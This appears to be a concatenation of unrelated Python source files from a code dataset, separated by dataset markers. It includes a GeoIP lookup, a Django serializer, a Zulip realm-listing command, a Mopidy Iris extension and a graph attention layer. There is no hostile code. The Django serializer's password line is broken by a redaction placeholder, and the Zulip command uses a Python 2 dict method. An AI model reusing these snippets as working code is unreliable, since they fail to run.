DATA = 'data/pokemon.csv'
COORDINATES = {
'GAUSS_LAT_MADRID': {'mu': 40.45, 'sigma': 0.2},
'GAUSS_LON_MADRID': {'mu': -3.60, 'sigma': 0.4},
'GAUSS_LAT_SEGOVIA': {'mu': 40.95, 'sigma': 0.1},
'GAUSS_LON_SEGOVIA': {'mu': -4.12, 'sigma': 0.2}
}
MEAN_INTERVAL = 3
MEAN_LOGIN = 5
NUM_USERS = 5 | StarcoderdataPython |
1654332 | <gh_stars>0
# -*- coding: utf-8 -*-
from enum import Enum
class Style(Enum):
"""
This class represent the text style in ShellColor.
"""
NONE = 0
BOLD = 1
LIGHT = 2
UNDERLINE = 4
BLINK = 5
INVERSE = 7
HIDDEN = 8
| StarcoderdataPython |
1796775 | #!/usr/bin/env python3.6
# -*- coding: utf-8 -*-
import geoip2.database
reader = geoip2.database.Reader('./data/GeoLite2-Country_20190806/GeoLite2-Country.mmdb')
def getCountryCode(ip: str):
try:
return reader.country(ip).country.iso_code
except:
return None
| StarcoderdataPython |
3359797 | <gh_stars>1-10
# coding=utf-8
# Copyright 2022 The Fiddle-Config Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A test module used in `module_reflection_test`."""
import fiddle as fdl
# Note: normally, this function should be defined in a different module!
def function_to_configure(x: int, y: str):
return x, y
def simple_base():
return fdl.Config(function_to_configure, x=2)
def alternate_base():
return fdl.Config(function_to_configure, x=0)
def base_with_defaults(x: int = 5, negative: bool = False):
if negative:
x = -x
return fdl.Config(function_to_configure, x=x)
def arbitrary_other_function(x, y): # pylint: disable=unused-argument
pass
def fiddler1(cfg: fdl.Config): # pylint: disable=unused-argument
pass
def fiddler2(cfg: fdl.Config): # pylint: disable=unused-argument
pass
def another_fiddler(cfg: fdl.Config, defaulted_arg=3): # pylint: disable=unused-argument
pass
| StarcoderdataPython |
101055 | <gh_stars>0
# Django imports
from rest_framework.serializers import ModelSerializer, ReadOnlyField
# Project imports
from address.serializers import AddressSerializer
from client.serializers import ClientSerializer
from user_address.models import UserAddress
from .models import User
class UserSerializer(ModelSerializer):
addresses = AddressSerializer(read_only=True, many=True)
client = ClientSerializer(read_only=True)
date_joined = ReadOnlyField()
class Meta:
model = User
fields = (
'id',
'email',
'first_name',
'last_name',
'date_joined',
'password',
'addresses',
'client',
)
extra_kwargs = {
'password': {'<PASSWORD>}
}
def to_representation(self, instance):
ret = super().to_representation(instance)
user_addresses = UserAddress.objects.filter(user__id=instance.id).distinct()
if user_addresses is not None:
serialized = AddressSerializer(data=user_addresses, many=True)
ret.update({
'addresses': serialized.data if serialized.is_valid() else [],
})
return ret
| StarcoderdataPython |
3267213 | <gh_stars>1-10
# -*- coding: utf8 -*-
"Namespace-related models"
from uuid import uuid4
from django.db import models
class Namespace(models.Model):
"Namespace model"
uuid = models.UUIDField(primary_key=True, default=uuid4, editable=False)
name = models.CharField(max_length=255)
@property
def groups(self):
"Iterable list of all variables groups in this namespace"
return self.groups_relation.all()
@property
def workflows(self):
"Iterable list of all workflows in this namespace"
return self.workflows_relation.all()
def __unicode__(self):
return self.name
class Meta:
permissions = (
('view_namespace', 'Voir le namespace'),
)
ordering = ['name']
| StarcoderdataPython |
1755976 | import datetime
from gw_utility.book import Book
from gw_utility.logging import Logging
def main():
Logging.line_separator("BOTH INCLUDE PUBLICATION DATES", 50, '+')
# Create two Books with identical arguments.
the_stand = Book("The Stand", "<NAME>", 1153, datetime.date(1978, 1, 1))
the_stand_2 = Book("The Stand", "<NAME>", 1153, datetime.date(1978, 1, 1))
# Check equivalency of Books.
check_equality(the_stand, the_stand_2)
Logging.line_separator("ONE MISSING PUBLICATION DATE", 50, '+')
# Create two Books, one without publication_date argument specified.
the_hobbit = Book("The Hobbit", "<NAME>", 366, datetime.date(1937, 9, 15))
the_hobbit_2 = Book("The Hobbit", "<NAME>", 366)
# Check equivalency of Books.
check_equality(the_hobbit, the_hobbit_2)
def check_equality(a, b):
"""Asserts the equivalent of the two passed objects.
:param a: First object.
:param b: Second object.
:return: Indicates if assertion was successful.
"""
try:
Logging.line_separator("ASSERTING EQUIVALENCE OF...")
# Output objects using __str__ method.
Logging.log(a)
Logging.log(b)
# Assert equivalence of objects, indicating inequality if failed.
assert a == b, "The objects ARE NOT equal."
# Indicate that assertion succeeded.
Logging.log("The objects are equal.")
return True
except AssertionError as error:
# Output expected AssertionErrors.
Logging.log_exception(error)
except Exception as exception:
# Output unexpected Exceptions.
Logging.log_exception(exception, False)
if __name__ == "__main__":
main()
| StarcoderdataPython |
4823678 | from .venmo import Venmo
def setup(bot):
bot.add_cog(Venmo(bot))
| StarcoderdataPython |
1671337 | __author__ = '<NAME>'
import numpy as np
from scipy.stats import spearmanr
class QuestionBase:
def __init__(self, filename):
self.word1 = []
self.word2 = []
self.sims = []
iFile = open(filename)
for line in iFile:
self.word1.append(line.split(',')[0])
self.word2.append(line.split(',')[1])
self.sims.append(float(line.split(',')[2]))
def __str__(self):
ret = ''
for i in range(self.word1.__len__()):
ret += 'Word 1 ' + self.word1[i] + '\n'
ret += 'Word 2 '+ self.word2[i] + '\n'
ret += 'Similarity' + str(self.sims[i]) + '\n\n'
return ret
def evaluate(self):
avgA = 0
for w in self.sims:
avgA += w
avgA /= len(self.sims)
stdDevA = 0
for w in self.sims:
stdDevA += np.power(w - avgA,2.0)
stdDevA /= len(self.sims)
stdDevA = np.sqrt(stdDevA)
avgB = 0
for w in self.simCalcs:
avgB += w
avgB /= len(self.simCalcs)
stdDevB = 0
for w in self.simCalcs:
stdDevB += np.power(w - avgB,2.0)
stdDevB /= len(self.simCalcs)
stdDevB = np.sqrt(stdDevB)
plotted = []
for i in range(len(self.sims)):
plotted.append(self.sims[i]*self.simCalcs[i])
EA = 0
EB = 0
EAB = 0
for i in range(len(self.sims)):
EA += self.sims[i]
EB += self.simCalcs[i]
EAB += plotted[i]
EA /= len(self.sims)
EB /= len(self.sims)
EAB /= len(self.sims)
cov = EAB - (EA*EB)
cor = cov / (stdDevA * stdDevB)
return cor
def classify(self,Classifier, oFile):
self.simCalcs = []
for i in range(self.word1.__len__()):
similarity = Classifier.Similarity(self.word1[i],self.word2[i])
self.simCalcs.append(similarity)
oFile.write(self.word1[i] + " " + self.word2[i] + " " + str(self.sims[i]) + " " + str(self.simCalcs[i]) + "\n")
oFile.write(str(self.evaluate()))
oFile.write('\n')
oFile.write(str(spearmanr(self.sims,self.simCalcs).correlation))
| StarcoderdataPython |
5636 | <filename>zerver/management/commands/list_realms.py<gh_stars>0
import sys
from typing import Any
from argparse import ArgumentParser
from zerver.models import Realm
from zerver.lib.management import ZulipBaseCommand
class Command(ZulipBaseCommand):
help = """List realms in the server and it's configuration settings(optional).
Usage examples:
./manage.py list_realms
./manage.py list_realms --all"""
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument("--all",
dest="all",
action="store_true",
default=False,
help="Print all the configuration settings of the realms.")
def handle(self, *args: Any, **options: Any) -> None:
realms = Realm.objects.all()
outer_format = "%-5s %-40s %-40s"
inner_format = "%-40s %s"
deactivated = False
if not options["all"]:
print(outer_format % ("id", "string_id", "name"))
print(outer_format % ("--", "---------", "----"))
for realm in realms:
if realm.deactivated:
print(self.style.ERROR(outer_format % (realm.id, realm.string_id, realm.name)))
deactivated = True
else:
print(outer_format % (realm.id, realm.string_id, realm.name))
if deactivated:
print(self.style.WARNING("\nRed rows represent deactivated realms."))
sys.exit(0)
# The remaining code path is the --all case.
identifier_attributes = ["id", "name", "string_id"]
for realm in realms:
# Start with just all the fields on the object, which is
# hacky but doesn't require any work to maintain.
realm_dict = realm.__dict__
# Remove a field that is confusingly useless
del realm_dict['_state']
# Fix the one bitfield to display useful data
realm_dict['authentication_methods'] = str(realm.authentication_methods_dict())
for key in identifier_attributes:
if realm.deactivated:
print(self.style.ERROR(inner_format % (key, realm_dict[key])))
deactivated = True
else:
print(inner_format % (key, realm_dict[key]))
for key, value in sorted(realm_dict.iteritems()):
if key not in identifier_attributes:
if realm.deactivated:
print(self.style.ERROR(inner_format % (key, value)))
else:
print(inner_format % (key, value))
print("-" * 80)
if deactivated:
print(self.style.WARNING("\nRed is used to highlight deactivated realms."))
| StarcoderdataPython |
3214258 | <reponame>clean-code-craft-tcq-1/stream-bms-data-ParthasaradhiWinfo<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 24 02:25:37 2021
@author: VNO1COB
"""
import json
def read_sender_inputs():
try:
input_value = input()
input_dict = json.loads(input_value)
print(input_dict)
print(input_dict["temperature"])
print(input_dict["chargerate"])
return input_dict["temperature"],input_dict["chargerate"]
except EOFError:
return None,None
def average_of_input_list(list_of_input_readings):
min_max_avg_list = []
min_max_avg_list.append(min(list_of_input_readings))
min_max_avg_list.append(max(list_of_input_readings))
if len(list_of_input_readings) >= 5:
min_max_avg_list.append(sum(list_of_input_readings[-5:])/len(list_of_input_readings))
return min_max_avg_list
def averagecalculation(temperature,chargerate):
min_max_dict = {}
min_max_dict["temperature"] = average_of_input_list(temperature)
min_max_dict["chargerate"] = average_of_input_list(chargerate)
print(min_max_dict)
return min_max_dict
| StarcoderdataPython |
4831389 | <filename>mopidy_iris/__init__.py
from __future__ import unicode_literals
import logging, os, json
import tornado.web
import tornado.websocket
import handlers
from mopidy import config, ext
from frontend import IrisFrontend
from handlers import WebsocketHandler, HttpHandler
from core import IrisCore
logger = logging.getLogger(__name__)
__version__ = '2.13.5'
##
# Core extension class
#
# Loads config and gets the party started. Initiates any additional frontends, etc.
##
class Extension( ext.Extension ):
dist_name = 'Mopidy-Iris'
ext_name = 'iris'
version = __version__
def get_default_config(self):
conf_file = os.path.join(os.path.dirname(__file__), 'ext.conf')
return config.read(conf_file)
def get_config_schema(self):
schema = config.ConfigSchema(self.ext_name)
schema['enabled'] = config.Boolean()
schema['pusherport'] = config.String()
schema['country'] = config.String()
schema['locale'] = config.String()
return schema
def setup(self, registry):
# Add web extension
registry.add('http:app', {
'name': self.ext_name,
'factory': iris_factory
})
# create our core instance
mem.iris = IrisCore()
mem.iris.version = self.version
# Add our frontend
registry.add('frontend', IrisFrontend)
def iris_factory(config, core):
path = os.path.join( os.path.dirname(__file__), 'static')
return [
(r"/images/(.*)", tornado.web.StaticFileHandler, {
'path': config['local-images']['image_dir']
}),
(r'/http/([^/]*)', handlers.HttpHandler, {
'core': core,
'config': config
}),
(r'/ws/?', handlers.WebsocketHandler, {
'core': core,
'config': config
}),
(r'/(.*)', tornado.web.StaticFileHandler, {
'path': path,
'default_filename': 'index.html'
}),
]
| StarcoderdataPython |
3357428 | <reponame>WingsUpete/EEG2Age
import dgl
import torch
import torch.nn as nn
import torch.nn.functional as F
class PwGaANLayer(nn.Module):
def __init__(self, in_dim, out_dim, num_nodes, num_heads=1, gate=False):
super(PwGaANLayer, self).__init__()
self.in_dim = in_dim
self.out_dim = out_dim
self.num_nodes = num_nodes
self.num_heads = num_heads
# Shared Weight W_a for AttentionNet
self.Wa = nn.Linear(self.in_dim, self.out_dim, bias=False)
# AttentionNet outer linear layer
# split fc to avoid cat
self.att_out_fc_l = nn.Linear(self.out_dim, 1, bias=False)
self.att_out_fc_r = nn.Linear(self.out_dim, 1, bias=False)
# Head gate layer
self.gate = gate
if self.gate:
# split fc to avoid cat
self.gate_fc_l = nn.Linear(self.in_dim, 1, bias=False)
self.gate_fc_m = nn.Linear(self.out_dim, 1, bias=False)
self.gate_fc_r = nn.Linear(self.in_dim, 1, bias=False)
self.Wg = nn.Linear(self.in_dim, self.out_dim, bias=False)
self.reset_parameters()
def reset_parameters(self):
""" Reinitialize learnable parameters. """
gain = nn.init.calculate_gain('leaky_relu')
nn.init.xavier_normal_(self.Wa.weight, gain=gain)
nn.init.xavier_normal_(self.att_out_fc_l.weight, gain=gain)
nn.init.xavier_normal_(self.att_out_fc_r.weight, gain=gain)
if self.gate:
gain = nn.init.calculate_gain('sigmoid')
nn.init.xavier_normal_(self.Wg.weight, gain=gain)
nn.init.xavier_normal_(self.gate_fc_l.weight, gain=gain)
nn.init.xavier_normal_(self.gate_fc_m.weight, gain=gain)
nn.init.xavier_normal_(self.gate_fc_r.weight, gain=gain)
def edge_attention(self, edges):
a = self.att_out_fc_l(edges.data['pre_w'] * edges.src['z']) + self.att_out_fc_r(edges.dst['z'])
return {'e': F.leaky_relu(a)}
def message_func(self, edges):
""" Specify messages to be propagated along edges """
# The messages will be sent to the mailbox
# mailbox['proj_z']: z->x, so we need z's projected features
# mailbox['e']: z->x has a e for attention calculation
if self.gate:
pwFeat = edges.data['pre_w'] * edges.src['v']
return {'proj_z': edges.src['proj_z'], 'e': edges.data['e'], 'pre_v_g': pwFeat}
else:
return {'proj_z': edges.src['proj_z'], 'e': edges.data['e']}
def reduce_func(self, nodes):
""" Specify how messages are processed and propagated to nodes """
# Aggregate features to nodes
alpha = F.softmax(nodes.mailbox['e'], dim=1)
alpha = F.dropout(alpha, 0.1)
h = torch.sum(alpha * nodes.mailbox['proj_z'], dim=1)
# head gates
if self.gate:
pwFeat = nodes.mailbox['pre_v_g']
gateProj = self.Wg(pwFeat)
maxFeat = torch.max(gateProj, dim=1)[0]
meanFeat = torch.mean(pwFeat, dim=1)
gFCVal = self.gate_fc_l(nodes.data['v']) + self.gate_fc_m(maxFeat) + self.gate_fc_r(meanFeat)
gVal = torch.sigmoid(gFCVal)
h = gVal * h
return {'h': h}
def forward(self, g: dgl.DGLGraph):
with g.local_scope():
feat = g.ndata['v']
# Wa: shared attention to features v (or h for multiple GAT layers)
z = self.Wa(feat)
g.ndata['z'] = z
# AttentionNet
g.apply_edges(self.edge_attention)
# Message Passing
g.update_all(self.message_func, self.reduce_func)
return (g.ndata['proj_z'] + g.ndata['h']).reshape(self.num_heads, int(g.batch_size / self.num_heads), self.num_nodes, -1, self.out_dim)
class MultiHeadPwGaANLayer(nn.Module):
def __init__(self, in_dim, out_dim, num_nodes, num_heads, merge='cat', gate=False):
super(MultiHeadPwGaANLayer, self).__init__()
self.gate = gate
self.num_heads = num_heads
self.pwGaAN = PwGaANLayer(in_dim, out_dim, num_nodes=num_nodes, num_heads=self.num_heads, gate=self.gate)
self.merge = merge
def forward(self, g: dgl.DGLGraph):
batch_g = dgl.batch([g for i in range(self.num_heads)])
head_outs = self.pwGaAN(batch_g)
del batch_g
if self.merge == 'cat':
return head_outs.permute(1, 2, 3, 0, 4).reshape(head_outs.shape[-4], head_outs.shape[-3], head_outs.shape[-2], -1)
elif self.merge == 'mean':
return torch.mean(head_outs, dim=0)
else:
return head_outs.permute(1, 2, 3, 0, 4).reshape(head_outs.shape[-4], head_outs.shape[-3], head_outs.shape[-2], -1) # Default: cat
| StarcoderdataPython |
Subsets and Splits